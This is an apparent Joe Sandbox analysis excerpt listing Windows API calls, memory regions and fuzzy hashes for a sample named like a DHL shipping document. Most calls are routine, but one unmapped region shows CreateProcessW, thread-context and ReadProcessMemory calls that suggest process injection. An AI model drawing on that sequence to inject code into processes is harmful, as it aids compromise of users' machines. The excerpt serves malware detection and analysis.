                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                            • String ID:
                                                                                            • API String ID: 3500052701-0
                                                                                            • Opcode ID: 11a3c4321ca4306c89b34ed3f21bf34c66b7d82d455e91e589284d71cbf01952
                                                                                            • Instruction ID: 520c36f6b1397c61f4066ecbea653f3d1a49c2cff4cf2aeddeab5a5dec034d7e
                                                                                            • Opcode Fuzzy Hash: 11a3c4321ca4306c89b34ed3f21bf34c66b7d82d455e91e589284d71cbf01952
                                                                                            • Instruction Fuzzy Hash: 43318470904354AFEB629F748895BE7BBECFB06308F00049AD59AD7285C7745A84CB61
                                                                                            APIs
                                                                                            • CloseHandle.KERNELBASE(00000000,00000000,?,?,008585CC,?,008E8CC8,0000000C), ref: 00858704
                                                                                            • GetLastError.KERNEL32(?,008585CC,?,008E8CC8,0000000C), ref: 0085870E
                                                                                            • __dosmaperr.LIBCMT ref: 00858739
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseErrorHandleLast__dosmaperr
                                                                                            • String ID:
                                                                                            • API String ID: 2583163307-0
                                                                                            • Opcode ID: c6eefef8e4ec87feabc05ad63e1b0e699527d2ec39123ad08b3c8e53d8733ba5
                                                                                            • Instruction ID: b97b34c023b47698c8155aa9cf412030889fe5194e43e7580360d33b06076ccb
                                                                                            • Opcode Fuzzy Hash: c6eefef8e4ec87feabc05ad63e1b0e699527d2ec39123ad08b3c8e53d8733ba5
                                                                                            • Instruction Fuzzy Hash: 6E014C326052209BD76062385859B7F6B85FB96776F25011AEC08EB2D2DEA08C898151
                                                                                            APIs
                                                                                            • TranslateMessage.USER32(?), ref: 0082DB7B
                                                                                            • DispatchMessageW.USER32(?), ref: 0082DB89
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0082DB9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 0082DBB1
                                                                                            • TranslateAcceleratorW.USER32(?,?,?), ref: 00871CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                            • String ID:
                                                                                            • API String ID: 3288985973-0
                                                                                            • Opcode ID: 2a8132c148f47fffa8fa149183a91d414b48964556b7c1b2e353bf20aed485e0
                                                                                            • Instruction ID: 390a12e89b02de7b90914040f9491f830ab796730d0f6d622accf9fed2cdaa4e
                                                                                            • Opcode Fuzzy Hash: 2a8132c148f47fffa8fa149183a91d414b48964556b7c1b2e353bf20aed485e0
                                                                                            • Instruction Fuzzy Hash: F5F0FE306543459BEB30CBB59C5DFEA77A8FB85350F104A29E65AC34D0DB30A488DB25
                                                                                            APIs
                                                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00892CD4,?,?,?,00000004,00000001), ref: 00892FF2
                                                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00892CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00893006
                                                                                            • CloseHandle.KERNEL32(00000000,?,00892CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0089300D
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                            • String ID:
                                                                                            • API String ID: 3397143404-0
                                                                                            • Opcode ID: 46aab531a992b32458ec3566415335e047ff995beb2f81de0d85a04684894b07
                                                                                            • Instruction ID: f222fe30d1c9f3395b3c696f3c6497879d77d035ec37895c057e664f72c68942
                                                                                            • Opcode Fuzzy Hash: 46aab531a992b32458ec3566415335e047ff995beb2f81de0d85a04684894b07
                                                                                            • Instruction Fuzzy Hash: 68E0863228021077D6312759BC0DF8B3B5CE78AB71F104320F759B61D046A0150142A8
                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 008317F6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Init_thread_footer
                                                                                            • String ID: CALL
                                                                                            • API String ID: 1385522511-4196123274
                                                                                            • Opcode ID: b0ee890a4620c5fc5ea9e62b9397fa0872ab01801785d053ad5de79a58e9fede
                                                                                            • Instruction ID: ebf5a7f10f34b0b620825f8820035120bcc4af119598d361bb2fe3a0968a7720
                                                                                            • Opcode Fuzzy Hash: b0ee890a4620c5fc5ea9e62b9397fa0872ab01801785d053ad5de79a58e9fede
                                                                                            • Instruction Fuzzy Hash: 80226B706082059FCB14DF18C488A2ABBE1FFC9714F18892DF59ACB362D771E855CB92
                                                                                            APIs
                                                                                            • _wcslen.LIBCMT ref: 00896F6B
                                                                                              • Part of subcall function 00824ECB: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad_wcslen
                                                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                                                            • API String ID: 3312870042-2806939583
                                                                                            • Opcode ID: 89ae838175ddef078c211010ffcdf7b4b3f8b743adc804099ab6094097203c4a
                                                                                            • Instruction ID: bb694735312abd30587e9620b5485907fb25f7613c49dbaf07b4b0ffa4844e7a
                                                                                            • Opcode Fuzzy Hash: 89ae838175ddef078c211010ffcdf7b4b3f8b743adc804099ab6094097203c4a
                                                                                            • Instruction Fuzzy Hash: FEB15E315182118FCB14EF28D49196EB7E5FF94314F08896DF496D72A2EB30ED89CB92
                                                                                            APIs
                                                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00862C8C
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                              • Part of subcall function 00822DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00822DC4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Name$Path$FileFullLongOpen
                                                                                            • String ID: X
                                                                                            • API String ID: 779396738-3081909835
                                                                                            • Opcode ID: 5cb02db1bfdaed7f001a86141d3eb72d78e8aedf63680530cc3d8d86d0db0528
                                                                                            • Instruction ID: 83f1dbeef365533db76d8a93c24a3b58f2a43b6709e62ca1db117b1699354564
                                                                                            • Opcode Fuzzy Hash: 5cb02db1bfdaed7f001a86141d3eb72d78e8aedf63680530cc3d8d86d0db0528
                                                                                            • Instruction Fuzzy Hash: 8D219671A002AC9FCB01EF98D845BEE7BF8FF59314F004059E505E7241EBB856898FA1
                                                                                            APIs
                                                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00823908
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: IconNotifyShell_
                                                                                            • String ID:
                                                                                            • API String ID: 1144537725-0
                                                                                            • Opcode ID: 6f6ddca7b566a7b5d4f5639db04161a83f8e16c61727dc6e9275ce853d2e32a5
                                                                                            • Instruction ID: 5bfaa5c92775a2fc03c6db9be2278732c64dd1363fa3fb1d658bb7ccc3c0429c
                                                                                            • Opcode Fuzzy Hash: 6f6ddca7b566a7b5d4f5639db04161a83f8e16c61727dc6e9275ce853d2e32a5
                                                                                            • Instruction Fuzzy Hash: 5D315A70604311DFD721DF24E894BA6BBE8FB49708F00092EF99AC7350E775AA84CB52
                                                                                            APIs
                                                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 00B636EB
                                                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00B63781
                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00B637A3
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                            • String ID:
                                                                                            • API String ID: 2438371351-0
                                                                                            • Opcode ID: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                            • Instruction ID: e309939edb32133436c8a3b3b8ba00ed2a7b72db379efbc79d8e15a326694468
                                                                                            • Opcode Fuzzy Hash: d88754d343c0358fec48bb39518f6d050a5efe1528146ba10a354079ac39ca1d
                                                                                            • Instruction Fuzzy Hash: AF12CC24A24658C6EB24DF64D8507DEB272EF68300F1090E9910DEB7A5E77A4F81CF5A
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction ID: aea26b4491444a59210f2df3191b57c6fa29756a77967f78758f137d8b2b16cd
                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                            • Instruction Fuzzy Hash: 2631F374A00109DBC718CF59D484969FBB1FF89304F2496A5E90ACB656D731EEC1CBC0
                                                                                            APIs
                                                                                              • Part of subcall function 00824E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E9C
                                                                                              • Part of subcall function 00824E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00824EAE
                                                                                              • Part of subcall function 00824E90: FreeLibrary.KERNEL32(00000000,?,?,00824EDD,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EC0
                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824EFD
                                                                                              • Part of subcall function 00824E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E62
                                                                                              • Part of subcall function 00824E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00824E74
                                                                                              • Part of subcall function 00824E59: FreeLibrary.KERNEL32(00000000,?,?,00863CDE,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824E87
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                            • String ID:
                                                                                            • API String ID: 2632591731-0
                                                                                            • Opcode ID: b0b25ada21e4e1679d24b1597d95eb93a1311b6ddbd0f509a36dbc6dbce6c410
                                                                                            • Instruction ID: f8bca9ad3fa220a00fc014de57b128d3f0d1fe6d3a19f3ffde79669255b6d09e
                                                                                            • Opcode Fuzzy Hash: b0b25ada21e4e1679d24b1597d95eb93a1311b6ddbd0f509a36dbc6dbce6c410
                                                                                            • Instruction Fuzzy Hash: C111E731610225AADF14BB68ED02FAD77A5FF90710F10442DF542E61C1DE749E859B61
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: __wsopen_s
                                                                                            • String ID:
                                                                                            • API String ID: 3347428461-0
                                                                                            • Opcode ID: 96f565b54689ee2ec9bcada9b147a56af82ff1fd039c72d12264c2f92b31df6a
                                                                                            • Instruction ID: aa336161d7b37ca416f3ad8b013694b46bdb9b8ff90fc1d181c67c705d614f6a
                                                                                            • Opcode Fuzzy Hash: 96f565b54689ee2ec9bcada9b147a56af82ff1fd039c72d12264c2f92b31df6a
                                                                                            • Instruction Fuzzy Hash: 2C11257190410AAFCB05DF58E94099A7BF9FF48314F10405AFC09EB312DA30DA158BA9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                            • Instruction ID: 1244d36ab5ae52e505c077b411d172770f18427aec3a916dc0092073a6fd3bb3
                                                                                            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                            • Instruction Fuzzy Hash: 16F0D132510A1C96C7313A7D9C05B5A379CFF62336F110715F825E22D2DA749809C6A6
                                                                                            APIs
                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,008F1444,?,0083FDF5,?,?,0082A976,00000010,008F1440,008213FC,?,008213C6,?,00821129), ref: 00853852
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocateHeap
                                                                                            • String ID:
                                                                                            • API String ID: 1279760036-0
APIs
• FreeLibrary.KERNEL32(?,?,008F1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00824F6D
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00822DC4
  • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
APIs
  • Part of subcall function 00823837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00823908
  • Part of subcall function 0082D730: GetInputState.USER32 ref: 0082D807
• SetCurrentDirectoryW.KERNEL32(?), ref: 00822B6B
  • Part of subcall function 008230F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0082314E
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: IconNotifyShell_$CurrentDirectoryInputState
• String ID:
• API String ID: 3667716007-0
APIs
• CreateFileW.KERNELBASE(00000000,00000000,?,00860704,?,?,00000000,?,00860704,00000000,0000000C), ref: 008603B7
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
APIs
• SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00821CBC
Memory Dump Source
• Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
• Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
Similarity
• API ID: InfoParametersSystem
• String ID:
• API String ID: 3098949447-0
APIs
• Sleep.KERNELBASE(000001F4), ref: 00B63F41
Memory Dump Source
• Source File: 00000000.00000002.2075924973.0000000000B61000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B61000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_b61000_DHL 0737-12182024.jbxd
Similarity
• API ID: Sleep
• String ID:
• API String ID: 3472027048-0
APIs
  • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
• DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 008B961A
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008B965B
• GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 008B969F
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B96C9
• SendMessageW.USER32 ref: 008B96F2
• GetKeyState.USER32(00000011), ref: 008B978B
• GetKeyState.USER32(00000009), ref: 008B9798
• SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 008B97AE
• GetKeyState.USER32(00000010), ref: 008B97B8
• SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 008B97E9
• SendMessageW.USER32 ref: 008B9810
• SendMessageW.USER32(?,00001030,?,008B7E95), ref: 008B9918
• ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 008B992E
• ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 008B9941
• SetCapture.USER32(?), ref: 008B994A
• ClientToScreen.USER32(?,?), ref: 008B99AF
• ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 008B99BC
